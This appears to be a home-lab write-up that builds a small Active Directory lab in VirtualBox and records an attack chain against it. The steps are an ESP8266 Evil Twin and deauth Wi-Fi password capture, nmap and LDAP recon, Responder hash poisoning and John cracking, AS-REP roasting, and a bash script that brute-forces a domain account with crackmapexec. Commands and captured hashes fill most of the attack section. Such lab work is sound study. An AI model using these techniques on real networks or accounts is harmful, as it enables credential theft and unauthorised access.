🎯 Overview

Building an isolated lab environment to understand, demonstrate, and mitigate attacks against Active Directory. With several possible attack scenarios.

🔧 Technical Details

The installation is run locally using a laptop. Requirements:

1. VirtualBox (free, no admin rights required)
2. Windows Server 2012 R2 ISO (evaluation, 4.0 GB) 10.0.2.10 (Domain Controller)
3. Windows 10 ISO (evaluation, 5.5 GB) 10.0.2.20 (Windows 10 — Initial target)
4. Kali Linux OVA (pre-built, 3.5 GB) 10.0.2.100 (Attacker)
5. ESP8266 — Eviltwin
6. Domain (lab.local)
7. Arduino IDE latest version

Architecture:

⚡ Build Lab

STEP 1: SETUP VIRTUALBOX NETWORK

# Create NAT Network custom Nama: "NatforAD" Subnet: 10.0.2.0/24 Gateway: 10.0.2.1 DHCP: Enabled

STEP 2: INSTALL DOMAIN CONTROLLER (DC01)

Specifications VM:

• PC Name: DC01
• OS: Windows Server 2012 R2 with GUI
• RAM: 4096 MB
• Storage: 50 GB
• Network: NatforAD

Configure DC:

Powershell run as administrator

# 1. Set IP Static
New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 10.0.2.10 -PrefixLength 24 -DefaultGateway 10.0.2.1
Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses 10.0.2.10
# 2. Rename computer
Rename-Computer -NewName "DC01" -Restart
# 3. Install AD Domain Services
Install-WindowsFeature AD-Domain-Services -IncludeManagementTools
# 4. Promote to Domain Controller
# Domain: lab.local
# Forest functional level: Windows Server 2012 R2
# DSRM Password: DSRM@Lab2024!

STEP 3: MAKE ANOTHER USER FOR ATTACKING

Organizational Unit:

Powershell on DC01

New-ADOrganizationalUnit -Name "Targets" -Path "DC=lab,DC=local"

User Accounts:

1. regularuser — Regular domain user

SPN Configuration di Server 2012 R2

Format:

powershell

Set-ADUser -Identity svc_backup -Add @{servicePrincipalName="MSSQLSvc/dc01.lab.local"}

STEP 4: SETUP WINDOWS CLIENT (CLIENT01)

Specifications:

• Name: CLIENT01
• OS: Windows 10 Pro
• RAM: 2048 MB
• Storage: 40 GB
• Network: NatforAD

Configuration:

powershell

# 1. Set IP Static
New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 10.0.2.20 -PrefixLength 24 -DefaultGateway 10.0.2.1
Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses 10.0.2.10
# 2. Join domain
Add-Computer -DomainName "lab.local" -Credential (Get-Credential) -Restart
# Login dengan: LAB\\regularuser / Password123!

STEP 5: SETUP ATTACKER MACHINE (KALI LINUX)

Specifications:

• Image: Kali Linux VirtualBox OVA
• RAM: 2048 MB
• Storage: 20 GB
• Network: NatforAD

Configuration:

bash

# Set DNS ke DC
echo "nameserver 10.0.2.10" | sudo tee /etc/resolv.conf
# Test connectivity
ping 10.0.2.10
nslookup lab.local

5.1 DNS Resolution Issues in Kali

Solution: bash

sudo nano /etc/resolv.conf
# Ganti dengan: nameserver 10.0.2.10

STEP 6: SETUP EVILTWIN

https://github.com/p3tr0s/PhiSiFi

1. Install Arduino IDE
2. In Arduino go to File -> Preferences add this URL to Additional Boards Manager URLs -> https://raw.githubusercontent.com/SpacehuhnTech/arduino/main/package_spacehuhn_index.json
3. In Arduino go to Tools -> Board -> Boards Manager search for and install the deauther package
4. Download and open PhiSiFi with Arduino IDE
5. Select an ESP8266 Deauther board in Arduino under tools -> board
6. Connect your device and select the serial port in Arduino under tools -> port
7. Click Upload button

How to use:

• Connect to the AP named WiPhi_34732 with password d347h320 from your phone/PC.
• Select the target AP you want to attack (list of available APs refreshes every 30secs — page reload is required).
• Click the Start Deauthing button to start kicking devices off the selected network.
• Click the Start Evil-Twin button and optionally reconnect to the newly created AP named same as your target (will be open).
• You can stop any of the attacks by visiting 192.168.4.1/admin while conected to Evil-Twin AP or by resetting the ESP8266.
• Once a correct password is found, AP will be restarted with default ssid WiPhi_34732 / d347h320 and at the bottom of a table you should be able to see something like "Successfully got password for - TARGET_SSID - PASSWORD
• If you power down / hard reset the gathered info will be lost

🧪 Exploit

Skenario

Attempt to gain access to the Wi-Fi network using an Evil Twin attack. After successfully connecting a victim to the rogue access point, proceed with credential harvesting. The objective of this attack is to obtain valid user credentials and escalate access until Active Directory can be accessed with a privileged account.

Phase Attacking AD (MITRE ATT&CK):

1.. Pre-Reconnaissance — Try join WIFI Office Network Attack Name: Rogue Access Point Attack Technique: Evil Twin dengan credential harvesting Command: a. Login WIFI WiPhi_34732, with password d347h320 b. Visiting 192.168.4.1/admin c. Chose WIFI want to deauter d. Start deauth for close session user has connect to that network e. After that keep select ssid you want and start evil twin f. Wait until user input the password and SSID WiPhi_34732 appear again. g. And we got the password wifi

Result: Success connect company WiFi Tools: ESP8266 Deauther

2.. Reconnaissance — Information gathering — Mitre ID: TA0043 This phase aims to obtain as much information as possible about the target environment.

• nmap — Network scanning ✅ Discover live hosts on network 10.0.2.0/24 Command: sudo nmap -sn 10.0.2.0/24 Result: Nmap scan report for 10.0.2.1 Host is up (0.00024s latency). Nmap scan report for 10.0.2.10 Host is up (0.00023s latency). Nmap scan report for 10.0.2.20 Host is up (0.0012s latency). Nmap scan report for 10.0.2.100 (Kali linux) Host is up.
• nmap — Quick Port Scan ✅ Command: nmap — top-ports 50 10.0.2.10 10.0.2.20 Result: Nmap scan report for 10.0.2.10 Host is up (0.0012s latency). Not shown: 46 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 135/tcp open msrpc 445/tcp open microsoft-ds 49154/tcp open unknown MAC Address: 08:00:27:F5:05:30 (Oracle VirtualBox virtual NIC) Nmap scan report for 10.0.2.20 Host is up (0.0040s latency). Not shown: 47 closed tcp ports (reset) PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 08:00:27:3C:06:2A (Oracle VirtualBox virtual NIC)
• smbclient — SMB Null Session Attempt ❌ Commad: smbclient-N -L //10.0.2.10 smbclient -N -L //10.0.2.20 Result: session setup failed: NT_STATUS_ACCESS_DENIED session setup failed: NT_STATUS_ACCESS_DENIED
• nbtscan — enumeration NetBIOS Windows ✅ Command: nbtscan -r 10.0.2.0/24 Result: 10.0.2.20 : NetBIOS Name: CLIENT01 Mac Address: 08:00:27:3c:06:2a
• ldapsearch — LDAP enumeration ✅ Command: ldapsearch -x -H ldap://10.0.2.10 -b "" -s base "(objectclass=*)" 2>/dev/null Result: dnsHostName: DC01.lab.local

Conclusions that can be drawn from the recon stage are:

1. There are several active network services in the IP range 10.0.2.0/24.
2. There are several open ports on the active network.
3. When listing SMB (server message block) services, a protocol commonly used for shared file folders and printers within a network, we failed to obtain information because the policy was set so that this service would not be open to users who did not have the rights.
4. The nbtscan tool successfully scanned the network to find any Windows computers in that IP range and retrieved their identity, namely CLIENT01, which is owned by IP 10.0.2.20.
5. The ldapsearch tool obtained the DNS hostname results from IP 10.0.2.10, which belongs to DC01.
6. dnsrecon did not find any results in that IP range, possibly due to strict policies.
7. Therefore, we can conclude that DC01 has the IP address 10.0.2.10 and CLIENT01 has the IP address 10.0.2.20. Several open ports can be used for initial access.

3.. Initial Access — First time in This phase focuses on trying to connect inside target environtment using information that we collect from reconn phase.

a. crackmapexec — Password Spraying ❌ Command: crackmapexec smb 10.0.2.20 \ -d lab.local \ -u users_spray.txt \ -p passwords_spray.txt \ — continue-on-success Result: Password spray attempts failed, none showed success

b. AS-REP Roasting ❌ Attack name: Kerberos Pre-Auth Bypass Tools: Impacket GetNPUsers Command: python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py lab.local/ -no-pass -usersfile ~/wordlist/users_asrep.txt -dc-ip 10.0.2.10

Result: Impacket v0.13.0.dev0 — Copyright Fortra, LLC and its affiliated companies [-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User regularuser doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User localadmin doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)

All users who have registered have activated pre-authentication on their Kerberos, so this method cannot be used, but we have received information that the Kerberos session error has been revoked.

c. LLMNR/NBT-NS POISONING ATTACK ✅ Attack Name: Name Resolution Poisoning Tools: Responder

Keep listener on with this command Command: sudo responder -I eth0 -wv

Wait user try posibblity typo when he went go to new directory After get poisoning hash Copy hash to john the ripper format Using this command: sudo cat /usr/share/responder/logs/Responder-Session.log | grep "regularuser" > ~/wordlist/captured_hash.txt

After get hash change hash format to john the ripper format: cat > john_hash.txt << EOF regularuser::LAB:3969f82da0cf5eb0:3FB50454B1A733CF30F0A1F03EFE2BA8:01010000000000000071BCE86690DC0169F0646A40C6A3080000000002000800360045005A004A0001001E00570049004E002D0036003000380049004B0037005100570051004500300004003400570049004E002D0036003000380049004B003700510057005100450030002E00360045005A004A002E004C004F00430041004C0003001400360045005A004A002E004C004F00430041004C0005001400360045005A004A002E004C004F00430041004C00070008000071BCE86690DC0106000400020000000800300030000000000000000000000000200000AD3E5A421B6CFD6EAAC6F6413AEDF814847D73342DC8A8BADC4EC75FDD8B991D0A001000000000000000000000000000000000000900180063006900660073002F00660069006C0073006500730073000000000000000000 EOF

After we get hash try to crack hash with john the ripper prepare word list or using common wordlist like rockyou.txt Using this command: john — format=netntlmv2 — wordlist=passwords_john.txt john_hash.txt

Because i have done crack that hash so i we cann se that password like this john — show john_hash.txt

Result: Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Password123@ (regularuser) 1g 0:00:00:00 DONE (2026–01–28 15:34) 33.33g/s 433.3p/s 433.3c/s 433.3C/s Password123..Password123@ Use the " — show — format=netntlmv2" options to display all of the cracked passwords reliably Session completed.

Binggo we get reguleruser password is **Password123@

Check cache crack hash. john --show john_hash.txt

Conclusion: 1. we have been try 3 method for intial acces and we got 1 steps successful and we got regularuser password Password123@

4.. Lateral Movement — Move in system First we will test smb using account we get using this command: smbclient -L //10.0.2.20 -U 'lab.local/regularuser%Password123@'

Result: SMB connection SUCCESSFUL but can only access default shares! And can only read, not write or execute.

Try more way a. SMB Lateral Movement ❌ Attack name: Remote Service Execution via SMB Tools: Impacket smbexec

Command: python3 /usr/share/doc/python3-impacket/examples/smbexec.py lab.local/regularuser:Password123@@10.0.2.20 Result: [-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

regularuser doesn't have access to SMB that good point for company user who has not have admin can do it remote execution.

b. WMI Lateral Movement ❌ Attack name: Windows Management Instrumentation Tools: Impacket wmiexec

Command: python3 /usr/share/doc/python3-impacket/examples/wmiexec.py lab.local/regularuser:Password123@@10.0.2.20 Result: Failed - ACCESS_DENIED

c. RDP Access Attempt ❌ Attack name: Remote Desktop Protocol Tools: xfreerdp3 Command: xfreerdp3 /v:10.0.2.20 /u:regularuser /p:'Password123@' /d:lab.local Result: Port RDP close

Conclusion: 1. All method for latheral movement to regularuser is failed. 2. soo maybe this account not have permission for remote. 3. we must try another account

5.. Privilege Escalation — Move to account privilege We will try find another user using user we have.

a. Domain User Enumeration ✅ Attack name: Active Directory Reconnaissance Tools: rpcclient, crackmapexec

Command: rpcclient rpcclient -U 'lab.local\\regularuser%Password123@' 10.0.2.10 -c "enumdomusers"

Result: rpc client user:[Administrator] rid:[0x1f4] (RID: 500/0x1f4) → PRIMARY TARGET user:[Guest] rid:[0x1f5] (RID: 501/0x1f5) → Default guest account user:[krbtgt] rid:[0x1f6] (RID: 502/0x1f6) → Kerberos service account (Golden Ticket potential) user:[vulnuser] rid:[0x450] (RID: 1104/0x450) → Possible vulnerable account user:[svc_backup] rid:[0x451] (RID: 1105/0x451) → Service account (high privilege potential) user:[regularuser] rid:[0x452] (RID: 1106/0x452) → Current compromised account user:[itsupport] rid:[0x456] (RID: 1110/0x456) → IT staff account user:[localadmin] rid:[0x457] (RID: 1111/0x457) → Local admin account

we found 8 user and for the first we will try to crack "vulnuser"

b. AS-REP Roasting (vulnuser) ✅ Attack name: Kerberos Ticket Harvesting Tools: Impacket GetNPUsers

Command: python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py lab.local/regularuser:Password123@ -dc-ip 10.0.2.10 -request -format hashcat -outputfile asrep_hashes.txt

Result: Get hash for vulnuser $krb5asrep$23$vulnuser@LAB.LOCAL:5615b31a3ed019d2b0bd853f6c79dfe3$31b4751389a0bba49b8d7b9b26cb371bc2c14a504a865b183941b62e0307753c2e710e8733e65cdfcaf772e7192685f1dc845534059176a4aaf14bb4031583fef97c0477fd321d3d68a36f53da9a6890d1df70c1669662c129016359b0bd22440bd675bf79de1abe036bbcf6b7da30faa34fe51365ed9d930ce8914d2d3a5db1b88ae103be0d313ba2650da22c4f1d0d3718191bc1bd198ec9b326cd1d10f5942f4cc615447f24dece359e7c5b759d853c6636a0ed975c179ae7d272a31ae45a9add65335af1f5689a28f76f1f4355fcdbee493373a685fb0d3680734429736a2179432b735e

c. Password Cracking Attack Attack name: Pattern-Based Password Attack Tools: Custom bash script + crackmapexec Script: ./crack_itsupport.sh Script: cat > crack_itsupport.sh << 'EOF' #!/bin/bash echo "==========================================" echo " CRACKING itsupport (DOMAIN ADMIN) " echo "==========================================" # Phase 1: Simple passwords echo "[PHASE 1] Testing simple passwords..." SIMPLE=("itsupport" "Itsupport123" "Password123@" "Lab@2024" "Welcome123") for pass in "${SIMPLE[@]}"; do echo -n " $pass ... " OUTPUT=$(timeout 2 crackmapexec smb 10.0.2.10 -u itsupport -p "$pass" -d lab.local 2>&1) echo "$OUTPUT" | grep -q "Pwn3d" && echo "✅ SUCCESS!" && echo "Password: $pass" && exit 0 echo "❌" done # Phase 2: Common IT passwords echo "[PHASE 2] Testing common IT passwords..." IT_PASS=("Support123" "Helpdesk2024" "ITadmin123" "Admin2024" "P@ssw0rd123") for pass in "${IT_PASS[@]}"; do echo -n " $pass ... " OUTPUT=$(crackmapexec smb 10.0.2.10 -u itsupport -p "$pass" -d lab.local 2>&1) echo "$OUTPUT" | grep -q "Pwn3d" && echo "✅ SUCCESS!" && echo "Password: $pass" && exit 0 echo "❌" done # Phase 3: Pattern-based (NEW: IT@Password pattern) echo "[PHASE 3] Testing IT@Password patterns..." # Base: IT@Password for num in "" "123" "1234" "2024" "2023" "2022"; do for special in "" "!" "@" "#" "$" "!"; do # Pattern 1: IT@Password[number][special] PASS1="IT@Password${num}${special}" echo -n " $PASS1 ... " OUTPUT=$(crackmapexec smb 10.0.2.10 -u itsupport -p "$PASS1" -d lab.local 2>&1) echo "$OUTPUT" | grep -q "Pwn3d" && echo "✅ SUCCESS!" && echo "Password: $PASS1" && exit 0 echo "❌" # Pattern 2: IT@password (lowercase p) PASS2="IT@password${num}${special}" echo -n " $PASS2 ... " OUTPUT=$(crackmapexec smb 10.0.2.10 -u itsupport -p "$PASS2" -d lab.local 2>&1) echo "$OUTPUT" | grep -q "Pwn3d" && echo "✅ SUCCESS!" && echo "Password: $PASS2" && exit 0 echo "❌" # Pattern 3: ITPassword (without @@) PASS3="ITPassword${num}${special}" echo -n " $PASS3 ... " OUTPUT=$(crackmapexec smb 10.0.2.10 -u itsupport -p "$PASS3" -d lab.local 2>&1) echo "$OUTPUT" | grep -q "Pwn3d" && echo "✅ SUCCESS!" && echo "Password: $PASS3" && exit 0 echo "❌" done done echo "==========================================" echo "All attempts failed. Try different approach." EOF chmod +x crack_itsupport.sh ./crack_itsupport.sh

Try SMB with new credential itsupport Command: python3 /usr/share/doc/python3-impacket/examples/wmiexec.py 'lab.local/itsupport:IT@Password123!@10.0.2.10'

Running this command when login whoami

Binggo we get password for itsupport and this account has admin privilage.

Thank you.